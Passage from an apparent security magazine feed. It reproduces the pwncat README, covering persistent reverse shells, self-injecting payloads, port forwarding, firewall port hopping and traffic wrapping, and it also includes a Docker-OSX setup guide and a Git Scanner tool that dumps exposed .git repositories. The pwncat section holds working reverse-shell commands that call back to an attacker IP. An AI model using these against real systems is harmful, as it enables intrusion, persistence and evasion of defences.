Why unbreakable? Because it will keep coming back to you, even if you kill your listening server temporarily. In other words, the client will keep trying to connect to the specified server until success. If the connection is interrupted, it will keep trying again.

# The client
# --exec            # Provide this executable
# --nodns           # Keep the noise down and don't resolve hostnames
# --reconn          # Automatically reconnect back to you indefinitely
# --reconn-wait     # If connection is lost, connect back to you every 2 seconds

pwncat --exec /bin/bash --nodns --reconn --reconn-wait 2 10.0.0.1 4444

Unbreakable UDP reverse shell

Why unbreakable? Because it will keep coming back to you, even if you kill your listening server temporarily. In other words, the client will keep sending null bytes to the server to constantly announce itself.

# The client
# --exec            # Provide this executable
# --nodns           # Keep the noise down and don't resolve hostnames
# --udp             # Use UDP mode
# --ping-intvl      # Ping the server every 2 seconds

pwncat --exec /bin/bash --nodns --udp --ping-intvl 2 10.0.0.1 4444

Self-injecting reverse shell

Let's imagine you are able to create a very simple and unstable reverse shell from the target to your machine, such as a web shell via a PHP script or similar. Knowing that this will not persist very long or might break due to an unstable network connection, you could use pwncat to hook into this connection and deploy itself unbreakably on the target, fully automated.

All you have to do is use pwncat as your local listener and start it with the --self-inject switch. As soon as the client (e.g.: the reverse web shell) connects to it, it will do a couple of things:

  1. Enumerate Python availability and versions on the target
  2. Dump itself base64 encoded onto the target
  3. Use the target's Python to decode itself.
  4. Use the target's Python to start itself as an unbreakable reverse shell back to you

Once this is done, you can keep using the current connection or simply abandon it and start a new listener (yes, you don't need to start the listener before starting the reverse shell) to have the new pwncat client connect to you. The new listener also doesn't have to be pwncat; it can also be netcat or ncat.

The --self-inject switch:

pwncat -l 4444 --self-inject <cmd>:<host>:<port>
  • <cmd>: This is the command to start on the target (like -e/--exec, so you want it to be cmd.exe or /bin/bash)
  • <host>: This is for your local machine, the IP address to where the reverse shell shall connect back to
  • <port>: This is for your local machine, the port on which the reverse shell shall connect back to

So imagine your Kali machine is 10.0.0.1. You instruct your webshell that you inject onto a Linux server to connect to you at port 4444:

# Start this locally, before starting the reverse webshell
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445

You will then see something like this:

[PWNCAT CnC] Probing for: /bin/python
[PWNCAT CnC] Probing for: /bin/python2
[PWNCAT CnC] Probing for: /bin/python2.7
[PWNCAT CnC] Probing for: /bin/python3
[PWNCAT CnC] Probing for: /bin/python3.5
[PWNCAT CnC] Probing for: /bin/python3.6
[PWNCAT CnC] Probing for: /bin/python3.7
[PWNCAT CnC] Probing for: /bin/python3.8
[PWNCAT CnC] Probing for: /usr/bin/python
[PWNCAT CnC] Potential path: /usr/bin/python
[PWNCAT CnC] Found valid Python2 version: 2.7.16
[PWNCAT CnC] Creating tmpfile: /tmp/tmp3CJ8Us
[PWNCAT CnC] Creating tmpfile: /tmp/tmpgHg7YT
[PWNCAT CnC] Uploading: /home/cytopia/tmp/pwncat/bin/pwncat -> /tmp/tmpgHg7YT (3422/3422)
[PWNCAT CnC] Decoding: /tmp/tmpgHg7YT -> /tmp/tmp3CJ8Us
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4445 &

And you are set. You can now start another listener locally at 4445 (again, it will connect back to you endlessly, so it is not required to start the listener first).

# either netcat
nc -lp 4445
# or ncat
ncat -l 4445
# or pwncat
pwncat -l 4445

Unlimited self-injecting reverse shells

Instead of just asking for a single self-injecting reverse shell, you can instruct pwncat to spawn as many unbreakable reverse shells connecting back to you as you desire.

The --self-inject argument allows you to not only define a single port, but also

  1. A comma separated list of ports: 4445,4446,4447,4448
  2. A range definition: 4445-4448
  3. An increment: 4445+3

In order to spawn 4 reverse shells you would start your listener just as described above, but instead of a single port, you define multiple:

# Comma separated
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445,4446,4447,4448

# Range
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445-4448

# Increment
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445+3

Each of the above three commands will achieve the same behavior: spawning 4 reverse shells inside the target. Once the client connects, the output will look something like this:

[PWNCAT CnC] Probing for: /bin/python
[PWNCAT CnC] Probing for: /bin/python2
[PWNCAT CnC] Probing for: /bin/python2.7
[PWNCAT CnC] Probing for: /bin/python3
[PWNCAT CnC] Probing for: /bin/python3.5
[PWNCAT CnC] Probing for: /bin/python3.6
[PWNCAT CnC] Probing for: /bin/python3.7
[PWNCAT CnC] Probing for: /bin/python3.8
[PWNCAT CnC] Probing for: /usr/bin/python
[PWNCAT CnC] Potential path: /usr/bin/python
[PWNCAT CnC] Found valid Python2 version: 2.7.16
[PWNCAT CnC] Creating tmpfile: /tmp/tmp3CJ8Us
[PWNCAT CnC] Creating tmpfile: /tmp/tmpgHg7YT
[PWNCAT CnC] Uploading: /home/cytopia/tmp/pwncat/bin/pwncat -> /tmp/tmpgHg7YT (3422/3422)
[PWNCAT CnC] Decoding: /tmp/tmpgHg7YT -> /tmp/tmp3CJ8Us
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4445 &
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4446 &
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4447 &
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4448 &
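
To actually catch them, start one listener per port on your machine (as before, pwncat, netcat or ncat all work); for example:

# Run each listener in its own terminal
pwncat -l 4445
pwncat -l 4446
pwncat -l 4447
pwncat -l 4448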

Logging

Note: Ensure you have a reverse shell that keeps coming back to you. This way you can always change your logging settings without losing the shell.

Log level and redirection

If you feel like it, you can start a listener in full TRACE logging mode to figure out what's going on or simply to troubleshoot. Log messages are colored depending on their severity. Colors are automatically turned off if stderr is not a pty, e.g. when piping the output to a file. You can also manually disable colored logging for terminal output via the --color switch.

pwncat -vvvv -l 4444

You will see (among all the gibberish) DEBUG and TRACE messages like these:

2020-05-11 08:40:57,927 DEBUG NetcatServer.receive(): 'Client connected: 127.0.0.1:46744'
2020-05-11 08:40:57,927 TRACE [STDIN] 1854:producer(): Command output: b'\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 TRACE [STDIN] 2047:run_action(): [STDIN] Producer received: '\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 DEBUG [STDIN] 815:send(): Trying to send 15 bytes to 127.0.0.1:46744
2020-05-11 08:40:57,927 TRACE [STDIN] 817:send(): Trying to send: b'\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 DEBUG [STDIN] 834:send(): Sent 15 bytes to 127.0.0.1:46744 (0 bytes remaining)
2020-05-11 08:40:57,928 TRACE [STDIN] 1852:producer(): Reading command output

As soon as you see this on the listener, you can issue commands to the client. The debug messages are not strictly necessary, so you can safely terminate your server with Ctrl+c and start it again in silent mode:

pwncat -l 4444

Now wait at most a few seconds, depending on the interval at which the client comes back to you, and voila: your session is back, this time without any log noise.

Having no info messages at all is sometimes not desirable either; you might still want to know what is going on behind the scenes. Safely terminate your server with Ctrl+c and redirect the log messages to a file instead:

pwncat -l -vvv 4444 2> comm.txt

Now all you'll see in your terminal session are the actual command inputs and outputs. If you want to see what's going on behind the scenes, open a second terminal window and tail the comm.txt file:

# View communication info
tail -fn50 comm.txt

2020-05-11 08:40:57,927 DEBUG NetcatServer.receive(): 'Client connected: 127.0.0.1:46744'
2020-05-11 08:40:57,927 TRACE [STDIN] 1854:producer(): Command output: b'\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 TRACE [STDIN] 2047:run_action(): [STDIN] Producer received: '\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 DEBUG [STDIN] 815:send(): Trying to send 15 bytes to 127.0.0.1:46744
2020-05-11 08:40:57,927 TRACE [STDIN] 817:send(): Trying to send: b'\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 DEBUG [STDIN] 834:send(): Sent 15 bytes to 127.0.0.1:46744 (0 bytes remaining)
2020-05-11 08:40:57,928 TRACE [STDIN] 1852:producer(): Reading command output

Socket information

Another useful feature is the ability to display the currently configured socket and network settings. Use the --info switch with either socket, ipv4, ipv6, tcp or all to choose which settings to display.

Note: In order to view those settings, you must at least be at INFO log level (-vv).
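
For example, to start a listener and dump every available setting (a minimal sketch; pick socket, ipv4, ipv6 or tcp instead of all to narrow it down):

pwncat -vv --info all -l 4444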

An example output in IPv4/TCP mode without any custom settings is shown below:

INFO: [bind-sock] Sock: SO_DEBUG: 0
INFO: [bind-sock] Sock: SO_ACCEPTCONN: 1
INFO: [bind-sock] Sock: SO_REUSEADDR: 1
INFO: [bind-sock] Sock: SO_KEEPALIVE: 0
INFO: [bind-sock] Sock: SO_DONTROUTE: 0
INFO: [bind-sock] Sock: SO_BROADCAST: 0
INFO: [bind-sock] Sock: SO_LINGER: 0
INFO: [bind-sock] Sock: SO_OOBINLINE: 0
INFO: [bind-sock] Sock: SO_REUSEPORT: 0
INFO: [bind-sock] Sock: SO_SNDBUF: 16384
INFO: [bind-sock] Sock: SO_RCVBUF: 131072
INFO: [bind-sock] Sock: SO_SNDLOWAT: 1
INFO: [bind-sock] Sock: SO_RCVLOWAT: 1
INFO: [bind-sock] Sock: SO_SNDTIMEO: 0
INFO: [bind-sock] Sock: SO_RCVTIMEO: 0
INFO: [bind-sock] Sock: SO_ERROR: 0
INFO: [bind-sock] Sock: SO_TYPE: 1
INFO: [bind-sock] Sock: SO_PASSCRED: 0
INFO: [bind-sock] Sock: SO_PEERCRED: 0
INFO: [bind-sock] Sock: SO_BINDTODEVICE: 0
INFO: [bind-sock] Sock: SO_PRIORITY: 0
INFO: [bind-sock] Sock: SO_MARK: 0
INFO: [bind-sock] IPv4: IP_OPTIONS: 0
INFO: [bind-sock] IPv4: IP_HDRINCL: 0
INFO: [bind-sock] IPv4: IP_TOS: 0
INFO: [bind-sock] IPv4: IP_TTL: 64
INFO: [bind-sock] IPv4: IP_RECVOPTS: 0
INFO: [bind-sock] IPv4: IP_RECVRETOPTS: 0
INFO: [bind-sock] IPv4: IP_RETOPTS: 0
INFO: [bind-sock] IPv4: IP_MULTICAST_IF: 0
INFO: [bind-sock] IPv4: IP_MULTICAST_TTL: 1
INFO: [bind-sock] IPv4: IP_MULTICAST_LOOP: 1
INFO: [bind-sock] IPv4: IP_DEFAULT_MULTICAST_TTL: 0
INFO: [bind-sock] IPv4: IP_DEFAULT_MULTICAST_LOOP: 0
INFO: [bind-sock] IPv4: IP_MAX_MEMBERSHIPS: 0
INFO: [bind-sock] IPv4: IP_TRANSPARENT: 0
INFO: [bind-sock] TCP: TCP_NODELAY: 0
INFO: [bind-sock] TCP: TCP_MAXSEG: 536
INFO: [bind-sock] TCP: TCP_CORK: 0
INFO: [bind-sock] TCP: TCP_KEEPIDLE: 7200
INFO: [bind-sock] TCP: TCP_KEEPINTVL: 75
INFO: [bind-sock] TCP: TCP_KEEPCNT: 9
INFO: [bind-sock] TCP: TCP_SYNCNT: 6
INFO: [bind-sock] TCP: TCP_LINGER2: 60
INFO: [bind-sock] TCP: TCP_DEFER_ACCEPT: 0
INFO: [bind-sock] TCP: TCP_WINDOW_CLAMP: 0
INFO: [bind-sock] TCP: TCP_INFO: 10
INFO: [bind-sock] TCP: TCP_QUICKACK: 1
INFO: [bind-sock] TCP: TCP_FASTOPEN: 0

Port forwarding magic

Local TCP port forwarding

Scenario

  1. Alice can be reached from the Outside (TCP/UDP)
  2. Bob can only be reached from Alice's machine
                              |                               |
        Outside               |           DMZ                 |        private subnet
                              |                               |
                              |                               |
     +-----------------+     TCP     +-----------------+     TCP     +-----------------+
     | The cat         | -----|----> | Alice           | -----|----> | Bob             |
     |                 |      |      | pwncat          |      |      | MySQL           |
     | 56.0.0.1        |      |      | 72.0.0.1:3306   |      |      | 10.0.0.1:3306   |
     +-----------------+      |      +-----------------+      |      +-----------------+
     pwncat 72.0.0.1 3306     |      pwncat \                 |
                              |        -L 72.0.0.1:3306 \     |
                              |         10.0.0.1 3306         |
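
Spelled out, the commands embedded in the diagram are:

# On Alice (72.0.0.1): listen on 3306 and forward every connection to Bob's MySQL
pwncat -L 72.0.0.1:3306 10.0.0.1 3306

# On the outside machine: talk to Alice as if she were the MySQL server
pwncat 72.0.0.1 3306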

Local UDP port forwarding

Scenario

  1. Alice can be reached from the Outside (but only via UDP)
  2. Bob can only be reached from Alice's machine
                              |                               |
        Outside               |           DMZ                 |        private subnet
                              |                               |
                              |                               |
     +-----------------+     UDP     +-----------------+     TCP     +-----------------+
     | The cat         | -----|----> | Alice           | -----|----> | Bob             |
     |                 |      |      | pwncat -L       |      |      | MySQL           |
     | 56.0.0.1        |      |      | 72.0.0.1:3306   |      |      | 10.0.0.1:3306   |
     +-----------------+      |      +-----------------+      |      +-----------------+
     pwncat -u 72.0.0.1 3306  |      pwncat -u \              |
                              |        -L 72.0.0.1:3306 \     |
                              |        10.0.0.1 3306          |
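
Again, spelled out from the diagram (note that only the outside leg is UDP; Alice talks TCP to Bob):

# On Alice (72.0.0.1): accept UDP on 3306 and forward to Bob's MySQL over TCP
pwncat -u -L 72.0.0.1:3306 10.0.0.1 3306

# On the outside machine: connect via UDP
pwncat -u 72.0.0.1 3306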

Remote TCP port forward

Scenario

  1. Alice cannot be reached from the Outside
  2. Alice is allowed to connect to the Outside (TCP/UDP)
  3. Bob can only be reached from Alice's machine
                              |                               |
        Outside               |           DMZ                 |        private subnet
                              |                               |
                              |                               |
     +-----------------+     TCP     +-----------------+     TCP     +-----------------+
     | The cat         | <----|----- | Alice           | -----|----> | Bob             |
     |                 |      |      | pwncat          |      |      | MySQL           |
     | 56.0.0.1        |      |      | 72.0.0.1:3306   |      |      | 10.0.0.1:3306   |
     +-----------------+      |      +-----------------+      |      +-----------------+
     pwncat -l 4444           |      pwncat --reconn \        |
                              |        -R 56.0.0.1:4444 \     |
                              |        10.0.0.1 3306          |
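
The corresponding commands from the diagram:

# On the outside machine: wait for Alice to connect back
pwncat -l 4444

# On Alice: connect out to the cat and forward the session to Bob's MySQL, reconnecting if the link drops
pwncat --reconn -R 56.0.0.1:4444 10.0.0.1 3306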

Remote UDP port forward

Scenario

  1. Alice cannot be reached from the Outside
  2. Alice is allowed to connect to the Outside (UDP: DNS only)
  3. Bob can only be reached from Alice's machine
                              |                               |
        Outside               |           DMZ                 |        private subnet
                              |                               |
                              |                               |
     +-----------------+     UDP     +-----------------+     TCP     +-----------------+
     | The cat         | <----|----- | Alice           | -----|----> | Bob             |
     |                 |      |      | pwncat          |      |      | MySQL           |
     | 56.0.0.1        |      |      | 72.0.0.1:3306   |      |      | 10.0.0.1:3306   |
     +-----------------+      |      +-----------------+      |      +-----------------+
     pwncat -u -l 53          |      pwncat -u --reconn \     |
                              |        -R 56.0.0.1:53 \       |
                              |        10.0.0.1 3306          |
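
And the same for the DNS-only scenario, spelled out (the outbound port is 53 to match the stated DNS-only restriction):

# On the outside machine: listen on UDP/53
pwncat -u -l 53

# On Alice: connect out over UDP/53 and forward to Bob's MySQL
pwncat -u --reconn -R 56.0.0.1:53 10.0.0.1 3306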

Outbound port hopping

If you have no idea what outbound ports are allowed from the target machine, you can instruct the client (e.g.: in case of a reverse shell) to probe outbound ports endlessly.

# Reverse shell on target (the client)
# --exec            # The command shell the client should provide
# --reconn          # Instruct it to reconnect endlessly
# --reconn-wait     # Reconnect every 0.1 seconds
# --reconn-robin    # Use these ports to probe for outbound connections

pwncat --exec /bin/bash --reconn --reconn-wait 0.1 --reconn-robin 54-1024 10.0.0.1 53

Once the client is up and running, either use raw sockets to check for inbound traffic or use something like Wireshark or tcpdump to find out from where the client is able to connect back to you.
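
A minimal tcpdump sketch for spotting where the client manages to reach you (the interface name and filter are assumptions; adjust them to your setup):

# Watch for incoming TCP SYNs from the target on any port
sudo tcpdump -ni eth0 'tcp[tcpflags] & tcp-syn != 0 and src host <target-ip>'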

Once you have found one or more ports through which the client can reach you, simply start your listener locally on one of them and wait for the client to come back.

pwncat -l <ip> <port>

If the client connects to you, you will have a working reverse shell. If you stop your local listening server accidentally or on purpose, the client will probe ports again until it connects successfully. In order to kill the reverse shell client, you can use --safe-word (when starting the client).

If none of this succeeds, you can add other measures such as using UDP or even wrapping your packets into higher level protocols, such as HTTP or others. See PSE or examples below for how to transform your traffic.

Pwncat Scripting Engine (PSE)

pwncat offers a Python based scripting engine to inject your custom code before sending and after receiving data.

How it works

You will simply need to provide a Python file with the following entrypoint function:

def transform(data, pse):
    # Example to reverse a string
    return data[::-1]

The function itself must be named transform and its two parameters must be named data and pse. Other than that, you can add as much code as you like. Each instance of pwncat can take two scripts:

  1. --script-send: script will be applied before sending
  2. --script-recv: script will be applied after receiving

See the pwncat documentation for the PSE API and more details.
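
As a quick illustration before the real examples below (the file name pse-xor.py and the key are made up for this sketch), a symmetric XOR transform that could be used for both --script-send and --script-recv on both sides might look like this:

# pse-xor.py - hypothetical PSE transform script (illustration only)
KEY = 0x42  # assumed shared key; both sides must load the same script

def transform(data, pse):
    # XOR every byte with the key. XOR is its own inverse, so the same
    # script works for sending and receiving (assumes data arrives as bytes on Python 3).
    return bytes(b ^ KEY for b in data)

Both ends would then start pwncat with --script-send pse-xor.py --script-recv pse-xor.py in addition to their normal arguments.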

Example 1: Self-built asymmetric encryption

PSE: asym-enc source code

This will encrypt your traffic asymmetrically. It is just a very basic ROT-style (Caesar cipher) implementation with different shift lengths on each side to emulate asymmetry. In the same way, you could implement GPG-based asymmetric encryption for PSE.

# server
pwncat -vvvv -l localhost 4444 \
  --script-send pse/asym-enc/pse-asym_enc-server_send.py \
  --script-recv pse/asym-enc/pse-asym_enc-server_recv.py
# client
pwncat -vvvv localhost 4444 \
  --script-send pse/asym-enc/pse-asym_enc-client_send.py \
  --script-recv pse/asym-enc/pse-asym_enc-client_recv.py

Example 2: Self-built HTTP POST wrapper

PSE: http-post source code

This will wrap all traffic into a valid HTTP POST request, making it look like normal HTTP traffic.

# server
pwncat -vvvv -l localhost 4444 \
  --script-send pse/http-post/pse-http_post-pack.py \
  --script-recv pse/http-post/pse-http_post-unpack.py
# client
pwncat -vvvv localhost 4444 \
  --script-send pse/http-post/pse-http_post-pack.py \
  --script-recv pse/http-post/pse-http_post-unpack.py

Port scanning

TCP

$ sudo netstat -tlpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address     State
tcp        0      0 127.0.0.1:631           0.0.0.0:*           LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*           LISTEN
tcp        0      0 127.0.0.1:4444          0.0.0.0:*           LISTEN
tcp        0      0 0.0.0.0:902             0.0.0.0:*           LISTEN
tcp6       0      0 ::1:631                 :::*                LISTEN
tcp6       0      0 ::1:25                  :::*                LISTEN
tcp6       0      0 ::1:4444                :::*                LISTEN
tcp6       0      0 :::1053                 :::*                LISTEN
tcp6       0      0 :::902                  :::*                LISTEN

UDP

The following UDP ports are exposed:

$ sudo netstat -ulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address
udp        0      0 0.0.0.0:631             0.0.0.0:*
udp        0      0 0.0.0.0:5353            0.0.0.0:*
udp        0      0 0.0.0.0:39856           0.0.0.0:*
udp        0      0 0.0.0.0:68              0.0.0.0:*
udp        0      0 0.0.0.0:68              0.0.0.0:*
udp6       0      0 :::1053                 :::*
udp6       0      0 :::5353                 :::*
udp6       0      0 :::57728                :::*

nmap

$ time sudo nmap -T5 localhost --version-intensity 0 -p- -sU
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-24 17:03 CEST
Warning: 127.0.0.1 giving up on port because retransmission cap hit (2).
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000035s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 65529 closed ports
PORT      STATE         SERVICE
68/udp    open|filtered dhcpc
631/udp   open|filtered ipp
1053/udp  open|filtered remote-as
5353/udp  open|filtered zeroconf
39856/udp open|filtered unknown
40488/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 179.15 seconds

real    2m52.446s
user    0m0.844s
sys     0m2.571s

netcat

$ time nc  -z localhost 1-65535  -u -4 -v
Connection to localhost 68 port [udp/bootpc] succeeded!
Connection to localhost 631 port [udp/ipp] succeeded!
Connection to localhost 1053 port [udp/*] succeeded!
Connection to localhost 5353 port [udp/mdns] succeeded!
Connection to localhost 39856 port [udp/*] succeeded!

real    0m18.734s
user    0m1.004s
sys     0m2.634s

pwncat

$ time pwncat -z localhost 1-65535 -u -4
Scanning 65535 ports
[+]    68/UDP open   (IPv4)
[+]   631/UDP open   (IPv4)
[+]  1053/UDP open   (IPv4)
[+]  5353/UDP open   (IPv4)
[+] 39856/UDP open   (IPv4)

real    0m7.309s
user    0m6.465s
sys     0m4.794s

ℹ FAQ

Q: Is pwncat compatible with netcat?

A: Yes, it is fully compatible in the way it behaves in connect, listen and zero-i/o mode. You can even mix pwncat with netcat, ncat or similar tools.

Q: Does it work on X?

A: In its current state it works with Python 2, Python 3, PyPy2 and PyPy3, and is fully tested on Linux and macOS. Windows support is available, but is considered experimental (see the integration tests).

Q: I found a bug / I have to suggest a new feature! What can I do?

A: For bug reports or enhancements, please open an issue here.

Q: How can I support this project?

A: Thanks for asking! First of all, star this project to give me some feedback and see CONTRIBUTING.md for details.

🔒 cytopia sec tools

Below is a list of sec tools and docs I am maintaining.

Name           | Category            | Language   | Description
offsec         | Documentation       | Markdown   | Offsec checklist, tools and examples
header-fuzz    | Enumeration         | Bash       | Fuzz HTTP headers
smtp-user-enum | Enumeration         | Python 2+3 | SMTP users enumerator
urlbuster      | Enumeration         | Python 2+3 | Mutable web directory fuzzer
pwncat         | Pivoting            | Python 2+3 | Cross-platform netcat on steroids
badchars       | Reverse Engineering | Python 2+3 | Badchar generator
fuzza          | Reverse Engineering | Python 2+3 | TCP fuzzing tool

Contributing

See the contributing guidelines to help improve this project.

❗ Disclaimer

This tool may be used for legal purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If these terms are not acceptable to you, then do not use this tool.


More: https://github.com/cytopia/pwncat and http://pwncat.org

The post pwncat - netcat on steroids with Firewall, IDS/IPS evasion, and its fully scriptable with Python (PSE) appeared first on Hakin9 - IT Security Magazine.

Docker-OSX - Run Mac in a Docker container


Run Mac in a Docker container! Run near-native OSX-KVM in Docker! X11 Forwarding!

Author: Sick.Codes https://sick.codes/

Credits: OSX-KVM project among many others: https://github.com/kholia/OSX-KVM/blob/master/CREDITS.md

Docker Hub: https://hub.docker.com/r/sickcodes/docker-osx

Pull requests, suggestions very welcome!

docker pull sickcodes/docker-osx

docker run --privileged -v /tmp/.X11-unix:/tmp/.X11-unix sickcodes/docker-osx

# press ctrl G if your mouse gets stuck

# scroll down to troubleshooting if you have problems

Requirements: KVM on the host

You need to turn on hardware virtualization in your BIOS; it is very easy to do.

Then install QEMU and the related virtualization packages on the host if you haven't already:

# ARCH
sudo pacman -S qemu libvirt dnsmasq virt-manager bridge-utils flex bison ebtables edk2-ovmf

# UBUNTU DEBIAN
sudo apt install qemu qemu-kvm libvirt-clients libvirt-daemon-system bridge-utils virt-manager

# CENTOS RHEL FEDORA
sudo yum install libvirt qemu-kvm -y

# then run
sudo systemctl enable libvirtd.service
sudo systemctl enable virtlogd.service
sudo modprobe kvm

# reboot

Start the same container later (persistent disk)

This is for when you want to boot the same system again later.

If you don't do this, you will get a brand-new image every time.

# look at your recent containers
docker ps --all --filter "ancestor=docker-osx"
docker ps --all --filter "ancestor=sickcodes/docker-osx"

# boot the old ones
docker start $(docker ps -q --all --filter "ancestor=docker-osx")
docker start $(docker ps -q --all --filter "ancestor=sickcodes/docker-osx")

# close all the ones you don't need

# check which one is still running
docker ps

# write down the good one and then use that for later
docker start xxxxxxx

Additional Boot Instructions


# Boot the macOS Base System

# Click Disk Utility

# Erase the biggest disk

# Partition that disk and subtract 1GB and press Apply

# Click Reinstall macOS

Troubleshooting

Alternative run (thanks @roryrjb):

docker run --privileged --net host --cap-add=ALL -v /tmp/.X11-unix:/tmp/.X11-unix -v /dev:/dev -v /lib/modules:/lib/modules sickcodes/docker-osx

Check if hardware virtualization is on: egrep -c '(svm|vmx)' /proc/cpuinfo

Try adding yourself to the docker group: sudo usermod -aG docker $USER

Turn on the docker daemon: sudo nohup dockerd &

Check /dev/kvm permissions: sudo chmod 666 /dev/kvm

If you don't have Docker already

### Arch (pacman version isn't right at time of writing)

wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.5.tgz
tar -xzvf docker-*.tgz
sudo cp docker/* /usr/bin/
sudo dockerd &
sudo groupadd docker
sudo usermod -aG docker $USER
# run docker later
sudo nohup dockerd &

### Ubuntu

apt-get remove docker docker-engine docker.io containerd runc -y
apt-get install apt-transport-https ca-certificates curl gnupg-agent software-properties-common -y
curl -fsSL https://download.docker.com/linux/ubuntu/gpg |  apt-key add -
apt-key fingerprint 0EBFCD88
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
apt-get update -y
apt-get install docker-ce docker-ce-cli containerd.io -y
sudo dockerd &
sudo groupadd docker
sudo usermod -aG docker $USER

Backup the disk

Your image will be stored in:

/var/lib/docker/overlay2/...../arch/OSX-KVM/home/arch/OSX-KVM/mac_hdd_ng.img
# find your container's root folder

docker inspect $(docker ps -q --all --filter "ancestor=docker-osx") | grep UpperDir

# In the folder from the above command, your image is inside ./home/arch/OSX-KVM/mac_hdd_ng.img

# Then sudo cp it somewhere. Don't do it while the container is running though, as it bugs out.
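
A hedged sketch of the full workflow (the container ID and UpperDir path are placeholders; take them from docker ps and the inspect command above):

# Stop the container first so the image is not being written to
docker stop <container-id>

# Copy the disk image out of the container's UpperDir to a safe place
sudo cp <UpperDir>/home/arch/OSX-KVM/mac_hdd_ng.img ~/mac_hdd_ng.backup.img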

Wipe old images


# WARNING deletes all old images, but saves disk space if you make too many containers

docker system prune --all
docker image prune --all

Instant OSX-KVM in a BOX!

This Dockerfile automates the installation of OSX-KVM inside a docker container. It will build a 32GB Mojave Disk. You can change the size and version using build arguments (see below). This file builds on top of the work done by Dhiru Kholia and many others on the OSX-KVM project.

Custom Build


docker build -t docker-osx:latest \
--build-arg VERSION=10.14.6 \
--build-arg SIZE=200G .

docker run --privileged -v /tmp/.X11-unix:/tmp/.X11-unix docker-osx:latest

Todo:

# persistent disk with least amount of pre-build errands.

More: https://github.com/sickcodes/Docker-OSX

The post Docker-OSX - Run Mac in a Docker container appeared first on Hakin9 - IT Security Magazine.

Git Scanner: A tool for targeting websites that have open .git repositories available in public


Git Scanner is a framework that can scan websites for publicly exposed .git repositories for bug hunting / pentesting purposes, and can dump the contents of the .git repositories it finds on web servers. The tool works with either a single target or a mass-target list provided from a file.

Installation of Git Scanner

$ git clone https://github.com/HightechSec/git-scanner
$ cd git-scanner
$ bash gitscanner.sh

Or you can install it in your system like this:

$ git clone https://github.com/HightechSec/git-scanner
$ cd git-scanner
$ sudo cp gitscanner.sh /usr/bin/gitscanner && sudo chmod +x /usr/bin/gitscanner
$ gitscanner

Git Scanner Usage

  • Menus
    • Menu 1 is for scanning and dumping git repositories from a provided file that contains a list of target URLs, or from a single target URL.
    • Menu 2 is for scanning only for git repositories from a provided file that contains a list of target URLs, or from a single target URL.
    • Menu 3 is for dumping only the git repositories from a provided file that contains a list of target URLs, or from a single target URL. This also works for the "Maybe Vuln" results, or sometimes with a repository that has directory listing disabled or returns a 403 error response.
    • Menu 4 is for extracting files from a folder that holds dumped .git repositories to a destination folder.
  • URL Format
  • Extractor
    • When using the Extractor, make sure the location of the git repository that you select is correct. Remember, the first option is for inputting the selected git repository and the second option is for inputting the destination folder.

Requirements

  • curl
  • bash
  • git
  • sed

Todos

  • Creating a Docker image, if possible
  • Adding an Extractor in the next version (added in version 1.0.2#beta, but still experimental)
  • Adding multi processing (Bash doesn't support threading)

Changelog

All notable changes to this project are listed in this file.

Credits

Thanks to:

The post Git Scanner: A tool for targeting websites that have open .git repositories available in public appeared first on Hakin9 - IT Security Magazine.
